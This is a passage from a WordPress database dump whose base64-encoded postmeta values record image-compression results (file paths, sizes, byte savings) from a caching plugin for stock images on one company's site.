RlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3ODg0NDgyMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDQxLCJ0aW1lIjoxNDgzNTQ4MDcyLCJpZCI6MjY1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3ODg0NDgyMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjgxMCwidGltZSI6MTQ4MzU0ODA3NiwiaWQiOjI2NTB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28784, 2623, 'wpfc_optimisation_reduction', '71850'); 
INSERT INTO `wp_postmeta` VALUES (28785, 2623, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLXZpc2Nvc2l0eS1vcHRlb24tc3Vwcmlvbi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2xpcXVpZC12aXNjb3NpdHktb3B0ZW9uLXN1cHJpb24uanBnIiwid2lkdGgiOjUzMywiaGVpZ2h0IjozMzUsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9saXF1aWQtdmlzY29zaXR5LW9wdGVvbi1zdXByaW9uLmpwZyIsInJlZHVjdGlvbiI6NzE4NDUsInRpbWUiOjE0ODM1NDgwODMsImlkIjoiMjYyMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLXZpc2Nvc2l0eS1vcHRlb24tc3Vwcmlvbi0zNDB4MzM1LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzM1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2xpcXVpZC12aXNjb3NpdHktb3B0ZW9uLXN1cHJpb24tMzQweDMzNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9saXF1aWQtdmlzY29zaXR5LW9wdGVvbi1zdXByaW9uLTM0MHgzMzUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MDg1LCJpZCI6MjYyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9saXF1aWQtdmlzY29zaXR5LW9wdGVvbi1zdXByaW9uLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLXZpc2Nvc2l0eS1vcHRlb24tc3Vwcmlvbi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2xpcXVpZC12aXNjb3NpdHktb3B0ZW9uLXN1cHJpb24tMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgwODcsImlkIjoyNjIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2xpcXVpZC12aXNjb3NpdHktb3B0ZW9uLXN1cHJpb24tMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9saXF1aWQtdmlzY29zaXR5LW9wdGVvbi1zdXByaW9uLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbGlxdWlkLXZpc2Nvc2l0eS1vcHRlb24tc3Vwcmlvbi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODA5MCwiaWQiOjI2MjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLXZpc2Nvc2l0eS1vcHRlb24tc3Vwcmlvbi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2xpcXVpZC12aXNjb3NpdHktb3B0ZW9uLXN1cHJpb24tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9saXF1aWQtdmlzY29zaXR5LW9wdGVvbi1zdXByaW9uLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MDkyLCJpZCI6MjYyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9saXF1aWQtdmlzY29zaXR5LW9wdGVvbi1zdXByaW9uLTUxMHgzMzUuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0IjozMzUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLXZpc2Nvc2l0eS1vcHRlb24tc3Vwcmlvbi01MTB4MzM1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2xpcXVpZC12aXNjb3NpdHktb3B0ZW9uLXN1cHJpb24tNTEweDMzNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgwOTQsImlkIjoyNjIzfV0='); 
INSERT INTO `wp_postmeta` VALUES (28786, 2622, 'wpfc_optimisation_reduction', '56399'); 
INSERT INTO `wp_postmeta` VALUES (28787, 2622, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLWRlbnNpdHktb3B0ZW9uLXN1cHJpb24uanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9saXF1aWQtZGVuc2l0eS1vcHRlb24tc3Vwcmlvbi5qcGciLCJ3aWR0aCI6NTE3LCJoZWlnaHQiOjMzMywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2xpcXVpZC1kZW5zaXR5LW9wdGVvbi1zdXByaW9uLmpwZyIsInJlZHVjdGlvbiI6NTYzOTQsInRpbWUiOjE0ODM1NDgxMDIsImlkIjoiMjYyMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLWRlbnNpdHktb3B0ZW9uLXN1cHJpb24tMzQweDMzMy5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9saXF1aWQtZGVuc2l0eS1vcHRlb24tc3Vwcmlvbi0zNDB4MzMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2xpcXVpZC1kZW5zaXR5LW9wdGVvbi1zdXByaW9uLTM0MHgzMzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MTA1LCJpZCI6MjYyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9saXF1aWQtZGVuc2l0eS1vcHRlb24tc3Vwcmlvbi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2xpcXVpZC1kZW5zaXR5LW9wdGVvbi1zdXByaW9uLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbGlxdWlkLWRlbnNpdHktb3B0ZW9uLXN1cHJpb24tMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgxMDcsImlkIjoyNjIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2xpcXVpZC1kZW5zaXR5LW9wdGVvbi1zdXByaW9uLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLWRlbnNpdHktb3B0ZW9uLXN1cHJpb24tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9saXF1aWQtZGVuc2l0eS1vcHRlb24tc3Vwcmlvbi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODEwOSwiaWQiOjI2MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbGlxdWlkLWRlbnNpdHktb3B0ZW9uLXN1cHJpb24tMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9saXF1aWQtZGVuc2l0eS1vcHRlb24tc3Vwcmlvbi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2xpcXVpZC1kZW5zaXR5LW9wdGVvbi1zdXByaW9uLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MTExLCJpZCI6MjYyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9saXF1aWQtZGVuc2l0eS1vcHRlb24tc3Vwcmlvbi01MTB4MzMzLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6MzMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2xpcXVpZC1kZW5zaXR5LW9wdGVvbi1zdXByaW9uLTUxMHgzMzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbGlxdWlkLWRlbnNpdHktb3B0ZW9uLXN1cHJpb24tNTEweDMzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgxMTQsImlkIjoyNjIyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28788, 2619, 'wpfc_optimisation_reduction', '9108'); 
INSERT INTO `wp_postmeta` VALUES (28789, 2619, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODkuanBnIiwid2lkdGgiOjMwMDAsImhlaWdodCI6MjAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODExOCwiaWQiOiIyNjE5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzEwNTc1OTg5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc0MywidGltZSI6MTQ4MzU0ODEyMiwiaWQiOjI2MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODktODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzEwNTc1OTg5LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMzc4LCJ0aW1lIjoxNDgzNTQ4MTI2LCJpZCI6MjYxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzEwNTc1OTg5LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODktNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEzNzEsInRpbWUiOjE0ODM1NDgxMzEsImlkIjoyNjE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODktMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozMDM5LCJ0aW1lIjoxNDgzNTQ4MTM2LCJpZCI6MjYxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzEwNTc1OTg5LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU5MSwidGltZSI6MTQ4MzU0ODE0MCwiaWQiOjI2MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzEwNTc1OTg5LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzAsInRpbWUiOjE0ODM1NDgxNDMsImlkIjoyNjE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzEwNTc1OTg5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTQyLCJ0aW1lIjoxNDgzNTQ4MTQ3LCJpZCI6MjYxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzEwNTc1OTg5LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxMDU3NTk4OS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTA1NzU5ODktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjk3NCwidGltZSI6MTQ4MzU0ODE1MSwiaWQiOjI2MTl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28790, 2570, 'wpfc_optimisation_reduction', '10798'); 
INSERT INTO `wp_postmeta` VALUES (28791, 2570, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUuanBnIiwid2lkdGgiOjUxNTAsImhlaWdodCI6MzQzMywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODE1NiwiaWQiOiIyNTcwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNDE4MDkwNjc1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjUyNywidGltZSI6MTQ4MzU0ODE2MCwiaWQiOjI1NzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGV